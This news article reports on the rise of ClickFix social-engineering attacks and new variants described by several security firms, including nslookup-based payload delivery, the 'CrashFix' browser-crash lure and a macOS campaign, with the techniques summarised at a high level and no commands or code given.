Researchers with cybersecurity firm ESET last year reported that the use of ClickFix methods in attacks grew more than 500% during the first half of 2025 compared with the last six months of the year before, accounting for almost 8% of attacks blocked by the firm during that time and becoming the second most common attack vector after phishing.

It was a surprising development for a cyber threat that had only emerged in late 2023, though it echoed what other security vendors have found in recent months, not only with the use of ClickFix in campaigns but also in its rapid evolution.

“The payloads at the end of ClickFix attacks vary widely – from infostealers to ransomware and even to nation-state malware – making this a versatile and formidable threat across Windows, Linux, and macOS,” wrote Jiří Kropáč, director of ESET’s Threat Prevention Labs.

In a report this week, Huntress security researchers Anna Pham and Michael Tigges called ClickFix “the social engineering technique that just won’t die.”

“ClickFix became one of the most prevalent initial access methods in 2025, adopted by both cybercriminal and nation-state actors alike,” Pham and Tigges wrote. “The technique tricks victims into copying and pasting malicious commands into their own systems, effectively turning users into the delivery mechanism and bypassing traditional email-based security controls entirely.”

Dropping Matanbuchus 3.0 Malware

Huntress is one of several security firms that have reported on ClickFix campaigns this month and the ongoing development efforts by the threat groups behind them. The vendor detailed a ClickFix infection that delivers the Matanbuchus 3.0 malware-as-a-service (MaaS) loader that has been sold on Russian-speaking underground forums since February 2021.

Previous Matanbuchus variants have delivered such payloads as Cobalt Strike, QakBot, DanaBot, the Rhadamanthys stealer, and NetSupport RAT, according to Pham and Tigges. Version 3.0 is a rewrite of the loader’s codebase and – based on its price of $10,000 to $15,000 a month – is used for high-value and targeted attacks rather than mass campaigns. In addition, it delivers a custom implant Huntress is calling AstarionRAT that the researchers hadn’t seen before, with its eventual goal being to deploy ransomware or exfiltrate data from victims’ systems.

The attack starts with a ClickFix push that includes brand impersonation, which includes combining fragments of recognizable security and cloud brand names to create fabricated but plausible-sounding service names. It then uses a prompt instructing the victim to execute a command, which deploys an MSI installer that drops Matanbuchus 3.0.

Microsoft and the DNS Lookup Tactic

Meanwhile, Microsoft Threat Intelligence wrote about a ClickFix campaign that asks “targets to run a command that executes a custom DNS lookup and parses the `Name:` response to receive the next-stage payload for execution.” The use of DNS lookups is a new twist in a technique that in the past has usually relied on messages regarding fixing errors or installing updates to get users to inadvertently execute malicious commands.

Pieter Arntz, malware analyst at Malwarebytes, wrote that “apparently, the criminals behind these campaigns have figured out that mshta and Powershell commands are increasingly being blocked by security software, so they have developed a new method using nslookup.”

With the new method, users are lured into running an nslookup command that goes to a DNS server that is controlled by the bad actor rather than the default DNS server on the victim’s system.

“The initial stages are pretty much the same as we have seen before: fake CAPTCHA instructions to prove you’re not a bot, solving non-existing computer problems or updates, causing browser crashes, and even instruction videos,” Arntz wrote. “Nslookup is a built‑in tool to use the internet ‘phonebook,’ and the criminals are basically abusing that phonebook to smuggle in instructions and malware instead of just getting an address.”

Leveraging nslookup

Nslookup is used to troubleshoot network problems, check if DNS is configured correctly, and investigate domains, he wrote. It’s not typically used to download or run programs. However, in this case, the bad actors “configured a server to reply with data that is crafted so that part of the ‘answer’ is actually another command or a pointer to malware, not just a normal IP address,” Arntz added.

That sets in motion an attack that includes downloading a ZIP archive from the external server, extracting a malicious Python script from the archive to run reconnaissance and discovery commands. It drops a Visual Basic script, which then drops and executes ModeloRAT, a Python-based remote access trojan (RAT) that gives bad actors control of the infected Windows system.

“Long story short, the cybercriminals have found yet another way to use a trusted technical tool and make it secretly carry the next step of the attack, all triggered by the victim following what looks like harmless copy‑paste support instructions,” Arntz wrote. “At which point they might hand over the control over their system.”

The New ‘CrashFix’ Method

The report came a couple of weeks after Microsoft wrote about a ClickFix campaign that uses a ploy that it called “CrashFix,” in which the threat actors deliberately crash victims’ browsers and then entice users to execute a malicious command by convincing them that doing so would fix the browser problem. The researchers wrote that “This variant represents a notable escalation in ClickFix tradecraft, combining user disruption with social engineering to increase execution success while reducing reliance on traditional exploit techniques.”

Also earlier this month, analysts with Intego Antivirus Labs wrote about a new ClickFix campaign called “Matryoshka” that’s aimed at macOS users that uses a fake installation and fix push to trick targets into executing a malicious Terminal command.

“While the ClickFix tactic is not new, this campaign introduces stronger evasion techniques – including an in-memory, compressed wrapper and API-gated network communications — designed to hinder static analysis and automated sandboxes,” they wrote. “At a high level, the attack relies on typosquatting and redirect infrastructure to deliver a ‘paste this fix’ prompt. Once executed, a loader retrieves an AppleScript payload that attempts to harvest browser credentials and target crypto wallet applications.”